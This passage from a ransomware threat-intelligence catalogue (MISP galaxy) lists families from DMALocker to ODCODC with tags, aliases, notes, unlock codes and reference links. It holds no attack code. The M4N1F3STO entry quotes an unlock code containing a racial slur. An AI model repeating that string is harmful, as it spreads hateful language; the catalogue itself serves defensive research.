https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg
https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/

DMALocker 3.0

Ransomware

The tag is: misp-galaxy:ransomware="DMALocker 3.0"

Table 5534. Table References
Links
https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg
https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-strikes-back/

DNRansomware

Ransomware Code to decrypt: 83KYG9NW-3K39V-2T3HJ-93F3Q-GT

The tag is: misp-galaxy:ransomware="DNRansomware"

Table 5535. Table References
Links
https://twitter.com/BleepinComputer/status/822500056511213568

Domino

Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="Domino"

Table 5536. Table References
Links
http://www.nyxbone.com/malware/Domino.html
http://www.bleepingcomputer.com/news/security/the-curious-case-of-the-domino-ransomware-a-windows-crack-and-a-cow/
https://id-ransomware.blogspot.com/2016/08/domino-ransomware.html

DoNotChange

Ransomware

The tag is: misp-galaxy:ransomware="DoNotChange"

Table 5537. Table References
Links
https://www.bleepingcomputer.com/forums/t/643330/donotchange-ransomware-id-7es642406cry-do-not-change-the-file-namecryp/
https://id-ransomware.blogspot.com/2017/03/donotchange-ransomware.html

DummyLocker

Ransomware

The tag is: misp-galaxy:ransomware="DummyLocker"

Table 5538. Table References
Links
https://twitter.com/struppigel/status/794108322932785158

DXXD

Ransomware

The tag is: misp-galaxy:ransomware="DXXD"

Table 5539. Table References
Links
https://www.bleepingcomputer.com/forums/t/627831/dxxd-ransomware-dxxd-help-support-readmetxt/
https://www.bleepingcomputer.com/news/security/the-dxxd-ransomware-displays-legal-notice-before-users-login/
https://id-ransomware.blogspot.com/2016/09/dxxd-ransomware.html

HiddenTear

Ransomware Open sourced C#

The tag is: misp-galaxy:ransomware="HiddenTear"

HiddenTear is also known as:

Cryptear
EDA2
Hidden Tear

View relationships graph

HiddenTear has relationships with:

similar: misp-galaxy:malpedia="EDA2" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="HiddenTear" with estimative-language:likelihood-probability="likely"

Table 5540. Table References
Links
http://www.utkusen.com/blog/dealing-with-script-kiddies-cryptear-b-incident.html
https://id-ransomware.blogspot.com/2016/06/hiddentear-2.html

EduCrypt

Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="EduCrypt"

EduCrypt is also known as:

EduCrypter

Table 5541. Table References
Links
http://www.filedropper.com/decrypter_1
https://twitter.com/JakubKroustek/status/747031171347910656
https://id-ransomware.blogspot.com/2016/06/hiddentear-2.html

EiTest

Ransomware

The tag is: misp-galaxy:ransomware="EiTest"

Table 5542. Table References
Links
https://twitter.com/BroadAnalysis/status/845688819533930497
https://twitter.com/malwrhunterteam/status/845652520202616832

El-Polocker

Ransomware Has a GUI

The tag is: misp-galaxy:ransomware="El-Polocker"

El-Polocker is also known as:

Los Pollos Hermanos

Table 5543. Table References
Links
https://id-ransomware.blogspot.com/2016/07/el-polocker-ransomware-aes-450-aud.html

Encoder.xxxx

Ransomware Coded in GO

The tag is: misp-galaxy:ransomware="Encoder.xxxx"

Encoder.xxxx is also known as:

Trojan.Encoder.6491

View relationships graph

Encoder.xxxx has relationships with:

similar: misp-galaxy:ransomware="Windows_Security Ransonware" with estimative-language:likelihood-probability="likely"

Table 5544. Table References
Links
http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/
http://vms.drweb.ru/virus/?_is=1&i=8747343

encryptoJJS

Ransomware

The tag is: misp-galaxy:ransomware="encryptoJJS"

Table 5545. Table References
Links
https://id-ransomware.blogspot.com/2016/11/encryptojjs-ransomware.html

Enigma

Ransomware

The tag is: misp-galaxy:ransomware="Enigma"

Table 5546. Table References
Links
http://www.bleepingcomputer.com/news/security/the-enigma-ransomware-targets-russian-speaking-users/
https://id-ransomware.blogspot.com/2016/05/enigma-ransomware-aes-128-0.html

Enjey

Ransomware Based on RemindMe

The tag is: misp-galaxy:ransomware="Enjey"

Table 5547. Table References
Links
https://twitter.com/malwrhunterteam/status/839022018230112256

Fairware

Ransomware Target Linux O.S.

The tag is: misp-galaxy:ransomware="Fairware"

Table 5548. Table References
Links
http://www.bleepingcomputer.com/news/security/new-fairware-ransomware-targeting-linux-computers/

Fakben

Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="Fakben"

Table 5549. Table References
Links
https://blog.fortinet.com/post/fakben-team-ransomware-uses-open-source-hidden-tear-code
https://id-ransomware.blogspot.com/2016/07/fakben-team-ransomware-aes-256-1505.html

FakeCryptoLocker

Ransomware

The tag is: misp-galaxy:ransomware="FakeCryptoLocker"

Table 5550. Table References
Links
https://twitter.com/PolarToffee/status/812312402779836416

Fantom

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Fantom"

Fantom is also known as:

Comrad Circle

Table 5551. Table References
Links
http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/

FenixLocker

Ransomware

The tag is: misp-galaxy:ransomware="FenixLocker"

Table 5552. Table References
Links
https://decrypter.emsisoft.com/fenixlocker
https://twitter.com/fwosar/status/777197255057084416
https://id-ransomware.blogspot.com/2016/09/fenixlocker-ransomware.html

FILE FROZR

Ransomware RaaS

The tag is: misp-galaxy:ransomware="FILE FROZR"

FILE FROZR is also known as:

FileFrozr

Table 5553. Table References
Links
https://twitter.com/rommeljoven17/status/846973265650335744
https://id-ransomware.blogspot.com/2017/03/filefrozr-ransomware.html

FileLocker

Ransomware

The tag is: misp-galaxy:ransomware="FileLocker"

Table 5554. Table References
Links
https://twitter.com/jiriatvirlab/status/836616468775251968

FireCrypt

Ransomware

The tag is: misp-galaxy:ransomware="FireCrypt"

View relationships graph

FireCrypt has relationships with:

similar: misp-galaxy:malpedia="FireCrypt" with estimative-language:likelihood-probability="likely"

Table 5555. Table References
Links
https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/
https://id-ransomware.blogspot.com/2017/01/bleedgreen-ransomware.html

Flyper

Ransomware Based on EDA2 / HiddenTear

The tag is: misp-galaxy:ransomware="Flyper"

Table 5556. Table References
Links
https://twitter.com/malwrhunterteam/status/773771485643149312
https://id-ransomware.blogspot.com/2016/09/flyper-ransomware.html

Fonco

Ransomware contact email safefiles32@mail.ru also as prefix in encrypted file contents

The tag is: misp-galaxy:ransomware="Fonco"

FortuneCookie

Ransomware

The tag is: misp-galaxy:ransomware="FortuneCookie"

Table 5557. Table References
Links
https://twitter.com/struppigel/status/842302481774321664

Free-Freedom

Ransomware Unlock code is: adam or adamdude9

The tag is: misp-galaxy:ransomware="Free-Freedom"

Free-Freedom is also known as:

Roga

View relationships graph

Free-Freedom has relationships with:

similar: misp-galaxy:ransomware="Roga" with estimative-language:likelihood-probability="likely"

Table 5558. Table References
Links
https://twitter.com/BleepinComputer/status/812135608374226944
https://id-ransomware.blogspot.com/2016/12/roga-ransomware.html

FSociety

Ransomware Based on EDA2 and RemindMe

The tag is: misp-galaxy:ransomware="FSociety"

Table 5559. Table References
Links
https://www.bleepingcomputer.com/forums/t/628199/fs0ciety-locker-ransomware-help-support-fs0cietyhtml/
http://www.bleepingcomputer.com/news/security/new-fsociety-ransomware-pays-homage-to-mr-robot/
https://twitter.com/siri_urz/status/795969998707720193
https://id-ransomware.blogspot.com/2016/08/fsociety-ransomware.html

Fury

Ransomware

The tag is: misp-galaxy:ransomware="Fury"

Table 5560. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547

GhostCrypt

Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="GhostCrypt"

Table 5561. Table References
Links
https://download.bleepingcomputer.com/demonslay335/GhostCryptDecrypter.zip
http://www.bleepingcomputer.com/forums/t/614197/ghostcrypt-z81928819-help-support-topic-read-this-filetxt/
https://id-ransomware.blogspot.com/2016/05/ghostcrypt-ransomware-aes-256-2-bitcoins.html

Gingerbread

Ransomware

The tag is: misp-galaxy:ransomware="Gingerbread"

Table 5562. Table References
Links
https://twitter.com/ni_fi_70/status/796353782699425792

Globe v1

Ransomware

The tag is: misp-galaxy:ransomware="Globe v1"

Globe v1 is also known as:

Purge

Table 5563. Table References
Links
https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221
http://www.bleepingcomputer.com/news/security/the-globe-ransomware-wants-to-purge-your-files/
https://id-ransomware.blogspot.com/2017/07/purge-kind-ransomware.html

GNL Locker

Ransomware Only encrypts DE or NL country. Variants, from old to latest: Zyklon Locker, WildFire locker, Hades Locker

The tag is: misp-galaxy:ransomware="GNL Locker"

View relationships graph

GNL Locker has relationships with:

similar: misp-galaxy:ransomware="Zyklon" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Zyklon" with estimative-language:likelihood-probability="likely"

Table 5564. Table References
Links
http://www.bleepingcomputer.com/forums/t/611342/gnl-locker-support-and-help-topic-locked-and-unlock-files-instructionshtml/
http://id-ransomware.blogspot.ru/2016/05/gnl-locker-ransomware-gnl-locker-ip.html

Gomasom

Ransomware

The tag is: misp-galaxy:ransomware="Gomasom"

Table 5565. Table References
Links
https://decrypter.emsisoft.com/
http://id-ransomware.blogspot.com/2016/05/gomasom-ransonware.html

Goopic

Ransomware

The tag is: misp-galaxy:ransomware="Goopic"

Table 5566. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/

Gopher

Ransomware OS X ransomware (PoC)

The tag is: misp-galaxy:ransomware="Gopher"

Hacked

Ransomware Jigsaw Ransomware variant

The tag is: misp-galaxy:ransomware="Hacked"

Table 5567. Table References
Links
https://twitter.com/demonslay335/status/806878803507101696
http://id-ransomware.blogspot.com/2016/12/hackedlocker-ransomware.html

HappyDayzz

Ransomware

The tag is: misp-galaxy:ransomware="HappyDayzz"

Table 5568. Table References
Links
https://twitter.com/malwrhunterteam/status/847114064224497666
http://id-ransomware.blogspot.com/2017/03/happydayzz-blackjocker-ransomware.html

Harasom

Ransomware

The tag is: misp-galaxy:ransomware="Harasom"

Table 5569. Table References
Links
https://decrypter.emsisoft.com/

HDDCryptor

Ransomware Uses https://diskcryptor.net for full disk encryption

The tag is: misp-galaxy:ransomware="HDDCryptor"

HDDCryptor is also known as:

Mamba

View relationships graph

HDDCryptor has relationships with:

similar: misp-galaxy:malpedia="Mamba" with estimative-language:likelihood-probability="likely"

Table 5570. Table References
Links
https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho
blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/[blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/]
http://id-ransomware.blogspot.com/2016/09/hddcryptor-ransomware-mbr.html

Heimdall

Ransomware File marker: "Heimdall---"

The tag is: misp-galaxy:ransomware="Heimdall"

Table 5571. Table References
Links
https://www.bleepingcomputer.com/news/security/heimdall-open-source-php-ransomware-targets-web-servers/
https://id-ransomware.blogspot.com/2016/11/heimdall-ransomware.html

Help_dcfile

Ransomware

The tag is: misp-galaxy:ransomware="Help_dcfile"

Table 5572. Table References
Links
http://id-ransomware.blogspot.com/2016/09/helpdcfile-ransomware.html

Herbst

Ransomware

The tag is: misp-galaxy:ransomware="Herbst"

View relationships graph

Herbst has relationships with:

similar: misp-galaxy:malpedia="Herbst" with estimative-language:likelihood-probability="likely"

Table 5573. Table References
Links
https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware
https://id-ransomware.blogspot.com/2016/06/herbst-autumn-ransomware-aes-256-01.html

Hi Buddy!

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Hi Buddy!"

Table 5574. Table References
Links
http://www.nyxbone.com/malware/hibuddy.html
http://id-ransomware.blogspot.ru/2016/05/hi-buddy-ransomware-aes-256-0.html

Hitler

Ransomware Deletes files

The tag is: misp-galaxy:ransomware="Hitler"

Table 5575. Table References
Links
http://www.bleepingcomputer.com/news/security/development-version-of-the-hitler-ransomware-discovered/
https://twitter.com/jiriatvirlab/status/825310545800740864
http://id-ransomware.blogspot.com/2016/08/hitler-ransomware.html

HolyCrypt

Ransomware

The tag is: misp-galaxy:ransomware="HolyCrypt"

View relationships graph

HolyCrypt has relationships with:

similar: misp-galaxy:ransomware="Dablio Ransomware" with estimative-language:likelihood-probability="likely"

Table 5576. Table References
Links
http://www.bleepingcomputer.com/news/security/new-python-ransomware-called-holycrypt-discovered/
https://id-ransomware.blogspot.com/2016/07/holycrypt-ransomware.html

HTCryptor

Ransomware Includes a feature to disable the victim’s windows firewall Modified in-dev HiddenTear

The tag is: misp-galaxy:ransomware="HTCryptor"

Table 5577. Table References
Links
https://twitter.com/BleepinComputer/status/803288396814839808

HydraCrypt

Ransomware CrypBoss Family

The tag is: misp-galaxy:ransomware="HydraCrypt"

Table 5578. Table References
Links
https://decrypter.emsisoft.com/
http://www.malware-traffic-analysis.net/2016/02/03/index2.html
https://id-ransomware.blogspot.com/2016/06/hydracrypt-ransomware-aes-256-cbc-rsa.html

iLock

Ransomware

The tag is: misp-galaxy:ransomware="iLock"

Table 5579. Table References
Links
https://twitter.com/BleepinComputer/status/817085367144873985

iLockLight

Ransomware

The tag is: misp-galaxy:ransomware="iLockLight"

International Police Association

Ransomware CryptoTorLocker2015 variant

The tag is: misp-galaxy:ransomware="International Police Association"

Table 5580. Table References
Links
http://download.bleepingcomputer.com/Nathan/StopPirates_Decrypter.exe

iRansom

Ransomware

The tag is: misp-galaxy:ransomware="iRansom"

Table 5581. Table References
Links
https://twitter.com/demonslay335/status/796134264744083460
http://id-ransomware.blogspot.com/2016/11/iransom-ransomware.html

JagerDecryptor

Ransomware Prepends filenames

The tag is: misp-galaxy:ransomware="JagerDecryptor"

Table 5582. Table References
Links
https://twitter.com/JakubKroustek/status/757873976047697920

Jeiphoos

Ransomware Windows, Linux. Campaign stopped. Actor claimed he deleted the master key.

The tag is: misp-galaxy:ransomware="Jeiphoos"

Jeiphoos is also known as:

Encryptor RaaS
Sarento

Table 5583. Table References
Links
http://www.nyxbone.com/malware/RaaS.html
http://blog.trendmicro.com/trendlabs-security-intelligence/the-rise-and-fall-of-encryptor-raas/

Jhon Woddy

Ransomware Same codebase as DNRansomware Lock screen password is M3VZ>5BwGGVH

The tag is: misp-galaxy:ransomware="Jhon Woddy"

Table 5584. Table References
Links
https://download.bleepingcomputer.com/demonslay335/DoNotOpenDecrypter.zip
https://twitter.com/BleepinComputer/status/822509105487245317

Jigsaw

Ransomware Has a GUI

The tag is: misp-galaxy:ransomware="Jigsaw"

Jigsaw is also known as:

CryptoHitMan
Jigsaw Original

View relationships graph

Jigsaw has relationships with:

similar: misp-galaxy:malpedia="Jigsaw" with estimative-language:likelihood-probability="likely"

Table 5585. Table References
Links
http://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/
https://www.helpnetsecurity.com/2016/04/20/jigsaw-crypto-ransomware/
https://twitter.com/demonslay335/status/795819556166139905
https://id-ransomware.blogspot.com/2016/04/jigsaw-ransomware.html

Job Crypter

Ransomware Based on HiddenTear, but uses TripleDES, decrypter is PoC

The tag is: misp-galaxy:ransomware="Job Crypter"

Job Crypter is also known as:

JobCrypter

Table 5586. Table References
Links
http://www.nyxbone.com/malware/jobcrypter.html
http://forum.malekal.com/jobcrypter-geniesanstravaille-extension-locked-crypto-ransomware-t54381.html
https://twitter.com/malwrhunterteam/status/828914052973858816
http://id-ransomware.blogspot.com/2016/05/jobcrypter-ransomware.html

JohnyCryptor

Ransomware

The tag is: misp-galaxy:ransomware="JohnyCryptor"

Table 5587. Table References
Links
http://id-ransomware.blogspot.com/2016/04/johnycryptor-ransomware.html

KawaiiLocker

Ransomware

The tag is: misp-galaxy:ransomware="KawaiiLocker"

Table 5588. Table References
Links
https://safezone.cc/resources/kawaii-decryptor.195/
http://id-ransomware.blogspot.com/2016/09/kawaiilocker-ransomware.html

KeRanger

Ransomware OS X Ransomware

The tag is: misp-galaxy:ransomware="KeRanger"

View relationships graph

KeRanger has relationships with:

similar: misp-galaxy:malpedia="KeRanger" with estimative-language:likelihood-probability="likely"

Table 5589. Table References
Links
http://news.drweb.com/show/?i=9877&lng=en&c=5
http://www.welivesecurity.com/2016/03/07/new-mac-ransomware-appears-keranger-spread-via-transmission-app/
https://id-ransomware.blogspot.com/2016/03/keranger-ransomware.html

KeyBTC

Ransomware

The tag is: misp-galaxy:ransomware="KeyBTC"

Table 5590. Table References
Links
https://decrypter.emsisoft.com/

KEYHolder

Ransomware via remote attacker. tuyuljahat@hotmail.com contact address

The tag is: misp-galaxy:ransomware="KEYHolder"

Table 5591. Table References
Links
http://www.bleepingcomputer.com/forums/t/559463/keyholder-ransomware-support-and-help-topic-how-decryptgifhow-decrypthtml
https://id-ransomware.blogspot.com/2016/06/keyholder-ransomware-xor-cfb-cipher.html

KillerLocker

Ransomware Possibly Portuguese dev

The tag is: misp-galaxy:ransomware="KillerLocker"

Table 5592. Table References
Links
https://twitter.com/malwrhunterteam/status/782232299840634881
http://id-ransomware.blogspot.com/2016/10/killerlocker-ransomware.html

KimcilWare

Ransomware websites only

The tag is: misp-galaxy:ransomware="KimcilWare"

Table 5593. Table References
Links
https://blog.fortinet.com/post/kimcilware-ransomware-how-to-decrypt-encrypted-files-and-who-is-behind-it
http://www.bleepingcomputer.com/news/security/the-kimcilware-ransomware-targets-web-sites-running-the-magento-platform/
http://id-ransomware.blogspot.com/2016/04/kimcilware-ransomware.html

Korean

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Korean"

Table 5594. Table References
Links
http://www.nyxbone.com/malware/koreanRansom.html
http://id-ransomware.blogspot.com/2016/08/korean-ransomware.html

Kozy.Jozy

Ransomware Potential Kit selectedkozy.jozy@yahoo.com kozy.jozy@yahoo.com unlock92@india.com

The tag is: misp-galaxy:ransomware="Kozy.Jozy"

Kozy.Jozy is also known as:

Table 5595. Table References
Links
http://www.nyxbone.com/malware/KozyJozy.html
http://www.bleepingcomputer.com/forums/t/617802/kozyjozy-ransomware-help-support-wjpg-31392e30362e32303136-num-lsbj1/
https://id-ransomware.blogspot.com/2016/06/kozy.html

KratosCrypt

Ransomware kratosdimetrici@gmail.com

The tag is: misp-galaxy:ransomware="KratosCrypt"

Table 5596. Table References
Links
https://twitter.com/demonslay335/status/746090483722686465
https://id-ransomware.blogspot.com/2016/06/kratoscrypt-ransomware-aes-256-0.html

KryptoLocker

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="KryptoLocker"

Table 5597. Table References
Links
https://id-ransomware.blogspot.com/2016/07/kryptolocker-ransomware-aes-256.html

LanRan

Ransomware Variant of open-source MyLittleRansomware

The tag is: misp-galaxy:ransomware="LanRan"

Table 5598. Table References
Links
https://twitter.com/struppigel/status/847689644854595584
http://id-ransomware.blogspot.com/2017/03/lanran-ransomware.html

LeChiffre

Ransomware Encrypts first 0x2000 and last 0x2000 bytes. Via remote attacker

The tag is: misp-galaxy:ransomware="LeChiffre"

Table 5599. Table References
Links
https://decrypter.emsisoft.com/lechiffre
https://blog.malwarebytes.org/threat-analysis/2016/01/lechiffre-a-manually-run-ransomware/
http://id-ransomware.blogspot.com/2016/05/lechiffre-ransomware.html

Lick

Ransomware Variant of Kirk

The tag is: misp-galaxy:ransomware="Lick"

Table 5600. Table References
Links
https://twitter.com/JakubKroustek/status/842404866614038529
https://www.2-spyware.com/remove-lick-ransomware-virus.html

Linux.Encoder

Ransomware Linux Ransomware

The tag is: misp-galaxy:ransomware="Linux.Encoder"

Linux.Encoder is also known as:

Linux.Encoder.{0,3}

Table 5601. Table References
Links
https://labs.bitdefender.com/2015/11/linux-ransomware-debut-fails-on-predictable-encryption-key/

LK Encryption

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="LK Encryption"

Table 5602. Table References
Links
https://twitter.com/malwrhunterteam/status/845183290873044994
http://id-ransomware.blogspot.com/2017/03/lk-encryption-ransomware.html

LLTP Locker

Ransomware Targeting Spanish speaking victims

The tag is: misp-galaxy:ransomware="LLTP Locker"

Table 5603. Table References
Links
https://www.bleepingcomputer.com/news/security/new-lltp-ransomware-appears-to-be-a-rewritten-venus-locker/
http://id-ransomware.blogspot.com/2017/03/lltp-ransomware.html

Locker

Ransomware has GUI

The tag is: misp-galaxy:ransomware="Locker"

Locker is also known as:

LockeR

Table 5604. Table References
Links
http://www.bleepingcomputer.com/forums/t/577246/locker-ransomware-support-and-help-topic/page-32#entry3721545
https://id-ransomware.blogspot.com/2016/04/locker-ransomware-2015.html

LockLock

Ransomware

The tag is: misp-galaxy:ransomware="LockLock"

Table 5605. Table References
Links
https://www.bleepingcomputer.com/forums/t/626750/locklock-ransomware-locklock-help-support/
https://id-ransomware.blogspot.com/2016/09/locklock-ransomware.html

Locky

Ransomware Affiliations with Dridex and Necurs botnets

The tag is: misp-galaxy:ransomware="Locky"

Locky is also known as:

Locky-Odin
Locky-Osiris
Locky-Osiris 2016
Locky-Osiris 2017

View relationships graph

Locky has relationships with:

similar: misp-galaxy:malpedia="Locky" with estimative-language:likelihood-probability="likely"

Table 5606. Table References
Links
http://www.bleepingcomputer.com/news/security/new-locky-version-adds-the-zepto-extension-to-encrypted-files/
http://blog.trendmicro.com/trendlabs-security-intelligence/new-locky-ransomware-spotted-in-the-brazilian-underground-market-uses-windows-script-files/
https://nakedsecurity.sophos.com/2016/10/06/odin-ransomware-takes-over-from-zepto-and-locky/
https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-egyptian-mythology-with-the-osiris-extension/
https://id-ransomware.blogspot.com/2016/02/locky.html

Lortok

Ransomware

The tag is: misp-galaxy:ransomware="Lortok"

Table 5607. Table References
Links
https://id-ransomware.blogspot.com/2016/06/lortok-ransomware-aes-256-5.html

LowLevel04

Ransomware Prepends filenames

The tag is: misp-galaxy:ransomware="LowLevel04"

Table 5608. Table References
Links
http://id-ransomware.blogspot.com/2016/04/lowlevel04-ransomware.html

M4N1F3STO

Ransomware Does not encrypt Unlock code=suckmydicknigga

The tag is: misp-galaxy:ransomware="M4N1F3STO"

Table 5609. Table References
Links
https://twitter.com/jiriatvirlab/status/808015275367002113
http://id-ransomware.blogspot.com/2016/12/m4n1f3sto-ransomware.html

Mabouia

Ransomware OS X ransomware (PoC)

The tag is: misp-galaxy:ransomware="Mabouia"

Table 5610. Table References
Links
https://www.youtube.com/watch?v=9nJv_PN2m1Y

MacAndChess

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="MacAndChess"

Table 5611. Table References
Links
http://id-ransomware.blogspot.com/2017/03/macandchess-ransomware.html

Magic

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Magic"

Table 5612. Table References
Links
http://id-ransomware.blogspot.com/2016/04/magic-ransomware.html

MaktubLocker

Ransomware

The tag is: misp-galaxy:ransomware="MaktubLocker"

Table 5613. Table References
Links
https://blog.malwarebytes.org/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/
http://id-ransomware.blogspot.com/2016/04/maktub-locker-ransomware.html

MarsJoke

Ransomware

The tag is: misp-galaxy:ransomware="MarsJoke"

Table 5614. Table References
Links
https://securelist.ru/blog/issledovaniya/29376/polyglot-the-fake-ctb-locker/
https://www.proofpoint.com/us/threat-insight/post/MarsJoke-Ransomware-Mimics-CTB-Locker
http://id-ransomware.blogspot.com/2016/09/jokefrommars-ransomware.html

Meister

Ransomware Targeting French victims

The tag is: misp-galaxy:ransomware="Meister"

Table 5615. Table References
Links
https://twitter.com/siri_urz/status/840913419024945152

Meteoritan

Ransomware

The tag is: misp-galaxy:ransomware="Meteoritan"

Table 5616. Table References
Links
https://twitter.com/malwrhunterteam/status/844614889620561924
http://id-ransomware.blogspot.com/2017/03/meteoritan-ransomware.html

MIRCOP

Ransomware Prepends files Demands 48.48 BTC

The tag is: misp-galaxy:ransomware="MIRCOP"

MIRCOP is also known as:

Crypt888
MicroCop

Table 5617. Table References
Links
http://www.bleepingcomputer.com/forums/t/618457/microcop-ransomware-help-support-lock-mircop/
https://www.avast.com/ransomware-decryption-tools#!
http://blog.trendmicro.com/trendlabs-security-intelligence/instruction-less-ransomware-mircop-channels-guy-fawkes/
http://www.nyxbone.com/malware/Mircop.html
https://id-ransomware.blogspot.com/2016/06/mircop-ransomware-4848.html

MireWare

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="MireWare"

Table 5618. Table References
Links
http://id-ransomware.blogspot.com/2016/05/mireware-ransomware.html

Mischa

Ransomware Packaged with Petya PDFBewerbungsmappe.exe

The tag is: misp-galaxy:ransomware="Mischa"

Mischa is also known as:

"Petya’s little brother"
Misha
Petya+Mischa
Petya-2

Table 5619. Table References
Links
http://www.bleepingcomputer.com/news/security/petya-is-back-and-with-a-friend-named-mischa-ransomware/
https://id-ransomware.blogspot.com/2016/05/petya-mischa-ransomware.html

MM Locker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="MM Locker"

MM Locker is also known as:

Booyah

View relationships graph

MM Locker has relationships with:

similar: misp-galaxy:ransomware="Booyah" with estimative-language:likelihood-probability="likely"

Table 5620. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered
https://id-ransomware.blogspot.com/2016/06/mm-locker-ransomware-aes-2256-1.html

Mobef

Ransomware

The tag is: misp-galaxy:ransomware="Mobef"

Mobef is also known as:

Yakes
CryptoBit

View relationships graph

Mobef has relationships with:

similar: misp-galaxy:ransomware="CryptoBit" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Mobef-JustFun" with estimative-language:likelihood-probability="likely"

Table 5621. Table References
Links
http://nyxbone.com/malware/Mobef.html
http://researchcenter.paloaltonetworks.com/2016/07/unit42-cryptobit-another-ransomware-family-gets-an-update/
http://nyxbone.com/images/articulos/malware/mobef/0.png
http://id-ransomware.blogspot.com/2016/05/mobef-yakes-ransomware-4-bitcoins-2000.html

Monument

Ransomware Use the DarkLocker 5 porn screenlocker - Jigsaw variant

The tag is: misp-galaxy:ransomware="Monument"

Table 5622. Table References
Links
https://twitter.com/malwrhunterteam/status/844826339186135040

N-Splitter

Ransomware Russian Koolova Variant

The tag is: misp-galaxy:ransomware="N-Splitter"

Table 5623. Table References
Links
https://twitter.com/JakubKroustek/status/815961663644008448
https://www.youtube.com/watch?v=dAVMgX8Zti4&feature=youtu.be&list=UU_TMZYaLIgjsdJMwurHAi4Q

n1n1n1

Ransomware Filemaker: "333333333333"

The tag is: misp-galaxy:ransomware="n1n1n1"

n1n1n1 is also known as:

N1N1N1

Table 5624. Table References
Links
https://twitter.com/demonslay335/status/790608484303712256
https://twitter.com/demonslay335/status/831891344897482754
http://id-ransomware.blogspot.com/2016/09/n1n1n1-ransomware.html

NanoLocker

Ransomware no extension change, has a GUI

The tag is: misp-galaxy:ransomware="NanoLocker"

View relationships graph

NanoLocker has relationships with:

similar: misp-galaxy:malpedia="NanoLocker" with estimative-language:likelihood-probability="likely"

Table 5625. Table References
Links
http://github.com/Cyberclues/nanolocker-decryptor
https://id-ransomware.blogspot.com/2016/06/nanolocker-ransomware-aes-256-rsa-01.html

Nemucod

Ransomware 7zip (a0.exe) variant cannot be decrypted Encrypts the first 2048 Bytes

The tag is: misp-galaxy:ransomware="Nemucod"

Nemucod is also known as:

Nemucod-7z
Nemucod-AES

Table 5626. Table References
Links
https://decrypter.emsisoft.com/nemucod
https://github.com/Antelox/NemucodFR
http://www.bleepingcomputer.com/news/security/decryptor-released-for-the-nemucod-trojans-crypted-ransomware/
https://blog.cisecurity.org/malware-analysis-report-nemucod-ransomware/
http://id-ransomware.blogspot.com/2016/04/nemucod-ransomware.html

Netix

Ransomware

The tag is: misp-galaxy:ransomware="Netix"

Netix is also known as:

RANSOM_NETIX.A

Table 5627. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/
https://id-ransomware.blogspot.com/2017/01/netflix-ransomware.html

Nhtnwcuf

Ransomware Does not encrypt the files / Files are destroyed

The tag is: misp-galaxy:ransomware="Nhtnwcuf"

Table 5628. Table References
Links
https://twitter.com/demonslay335/status/839221457360195589
http://id-ransomware.blogspot.com/2017/03/nhtnwcuf-ransomware.html

NMoreira

Ransomware

The tag is: misp-galaxy:ransomware="NMoreira"

NMoreira is also known as:

XRatTeam
XPan

Table 5629. Table References
Links
https://decrypter.emsisoft.com/nmoreira
https://twitter.com/fwosar/status/803682662481174528
id-ransomware.blogspot.com/2016/11/nmoreira-ransomware.html[id-ransomware.blogspot.com/2016/11/nmoreira-ransomware.html]

NoobCrypt

Ransomware

The tag is: misp-galaxy:ransomware="NoobCrypt"

Table 5630. Table References
Links
https://twitter.com/JakubKroustek/status/757267550346641408
https://www.bleepingcomputer.com/news/security/noobcrypt-ransomware-dev-shows-noobness-by-using-same-password-for-everyone/
https://id-ransomware.blogspot.com/2016/07/noobcrypt-ransomare-250-nzd.html

Nuke

Ransomware

The tag is: misp-galaxy:ransomware="Nuke"

Table 5631. Table References
Links
http://id-ransomware.blogspot.com/2016/10/nuke-ransomware.html

Nullbyte

Ransomware

The tag is: misp-galaxy:ransomware="Nullbyte"

Table 5632. Table References
Links
https://download.bleepingcomputer.com/demonslay335/NullByteDecrypter.zip
https://www.bleepingcomputer.com/news/security/the-nullbyte-ransomware-pretends-to-be-the-necrobot-pokemon-go-application/
http://id-ransomware.blogspot.com/2016/08/nullbyte-ransomware.html

ODCODC

Ransomware

